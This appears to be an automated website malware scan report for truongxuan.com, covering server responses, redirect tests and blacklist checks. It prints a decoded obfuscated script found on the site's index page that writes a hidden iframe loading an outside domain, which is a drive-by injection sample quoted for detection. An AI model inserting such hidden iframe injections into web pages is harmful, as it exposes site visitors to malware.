Scanned pages/files
Request | Server response | Status |
http://truongxuan.com/ | HTTP/1.1 200 OK Date: Fri, 03 Oct 2014 18:37:08 GMT Accept-Ranges: bytes ETag: "5f5c484ab3cfc91:c4afb" Server: Microsoft-IIS/6.0 Content-Length: 1712 Content-Location: http://truongxuan.com/truongxuan/index.htm Content-Type: text/html Last-Modified: Fri, 08 May 2009 08:02:10 GMT X-Powered-By: ASP.NET | clean |
http://truongxuan.com/truongxuan/index.htm | 200 OK Content-Length: 1712 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below): the page contains an obfuscated eval(String.fromCharCode(...)) call.
Decoded script:
var t=5;var hjg4="woll";var w="ance";var re6=".";var rrtt6="com";var a="if";var s="tt";document.write('<'+a+'rame src="h'+s+'p://'+hjg4+''+w+''+re6+''+rrtt6+'/'+'" width="1" height="3"></i'+'f'+'rame>');var w6=87498000002340
Markup written by the script:
<iframe src="http://wollance.com/" width="1" height="3"></iframe>
Antivirus reports:
http://truongxuan.com/test404page.js | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: truongxuan.com
Result:
HTTP/1.1 200 OK
Date: Fri, 03 Oct 2014 18:37:08 GMT
Accept-Ranges: bytes
ETag: "5f5c484ab3cfc91:c4afb"
Server: Microsoft-IIS/6.0
Content-Length: 1712
Content-Location: http://truongxuan.com/truongxuan/index.htm
Content-Type: text/html
Last-Modified: Fri, 08 May 2009 08:02:10 GMT
X-Powered-By: ASP.NET
...1712 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: truongxuan.com
Referer: http://www.google.com/search?q=truongxuan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=truongxuan.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://truongxuan.com/
Result: truongxuan.com is not infected or malware details are not published yet.